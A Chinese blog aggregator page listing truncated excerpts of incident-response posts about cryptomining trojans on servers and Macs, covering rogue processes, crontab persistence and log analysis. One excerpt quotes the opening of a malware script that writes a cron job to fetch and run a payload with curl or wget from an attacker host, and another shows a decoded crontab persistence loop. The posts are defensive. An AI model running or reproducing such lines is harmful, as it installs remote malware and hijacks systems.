1、因服务器负载过高,查看原因,通过top命令查看负载发现异常进程md64, 2、ps查看进程启动程序 3、kill掉后跳出名为tsm异常进程,怀疑挖矿木马程序。 使用kill -9 杀死后,一分钟左右又自动出现, 4、ps查找该进程目录,发现可疑文件/usr/sbin/http 然进入到该目录,并 ...
分类:
其他好文 时间:
2020-04-03 12:15:21
阅读次数:
73
转发自: "FREEBUF专栏" 原文链接: "https://www.freebuf.com/column/227843.html" 0x01 简介 在发生网页篡改、服务器被植入挖矿木马等安全攻击事件时,日志能协助进行安全事件还原,能尽快找到事件发生的时间、原因等,所以日志收集还是很重要的。本文整 ...
分类:
其他好文 时间:
2020-02-29 22:06:26
阅读次数:
380
1发现cpu占用很高,confluence用户启动了很多进程 2查看定时任务 crontab -l -u confluence 解析处理base64 ( while : ; do sleep 5 ; if ! kill -0 26154 >/dev/null 2>&1 ; then /opt/atl ...
分类:
其他好文 时间:
2019-12-30 21:01:53
阅读次数:
298
线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序。突然一则噩耗从前线传来:网站不能访问了。 此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接被killed,再试试数据库,同样没成功, ...
分类:
其他好文 时间:
2019-07-26 19:44:40
阅读次数:
110
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "*/10 * * * * (curl -fsSL lsd.systemten.org||wget -q... ...
分类:
其他好文 时间:
2019-06-05 11:20:05
阅读次数:
1177
问题现象 Linux 服务器收到报警信息,主机 CPU 跑满。 自动创建运行 Docker 容器 xmrig, 导致其他运行中容器被迫停止。 问题原因 通过 top 命令可以看到有一个 xmrig 进程占用了99%的 CPU。 经定位,该进程是一个挖矿木马程序,通过上述截图可以看到进程对应的 PID ...
分类:
其他好文 时间:
2018-08-18 13:15:04
阅读次数:
9806
背景 最近在应急中发现了一款Mac上的挖矿木马,目标是挖门罗币,经过走访,受害用户都有从苹果电脑上安装第三方dmg的经历(其中可以确定一款LOL Mac私服安装app会导致该木马),怀疑在网上很多第三方dmg都是携带了相关恶意程序的。 现象 根据用户反映中招用户一般会有以下几个症状: + CPU占有 ...
分类:
系统相关 时间:
2018-08-17 19:57:12
阅读次数:
1173
背景 某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞,可以直接GetShell。出于做安全的谨慎,马上出现场应急,确认漏洞。该漏洞存在在cookie字段中的rememberMe字段中,可以RCE 漏洞应急 来到现场后,发现已经升级了,漏洞确认修复完成,只能查看以前的攻击痕迹。 查 ...
分类:
其他好文 时间:
2018-07-02 11:09:25
阅读次数:
197
挖矿木马简介 随着区块链的火爆,各种虚拟货币的行情一路走高,不乏有人像炒房炒股一样,通过包括大名鼎鼎的比特币在内的各种虚拟货币发家致富,让人眼馋。在这种情况下,黑客怎么会放过这么赚钱的机会呢。大家都知道,获取虚拟货币除了买卖还有就挖矿,挖矿其实是通过计算机做一些复杂的运算去算出还没有归属的虚拟货币节 ...
分类:
其他好文 时间:
2018-06-03 21:23:27
阅读次数:
226
有一个客户服务器root密码设置很简单,被入侵挂马了。top能看到名称大概为10个字母的进程,字母是随机的。一看就不是正常进程(而且杀掉问题进程会自动生成新的、删除问题服务也会自动生成、很占用服务器带宽总是连接外网一个主机)。这种情况下,一般建议断开外网,然后处理。问题现象:1、查看定时任务(注意这三个地方都看下)[root@localhost ~]# crontab
分类:
其他好文 时间:
2018-03-07 19:01:22
阅读次数:
426
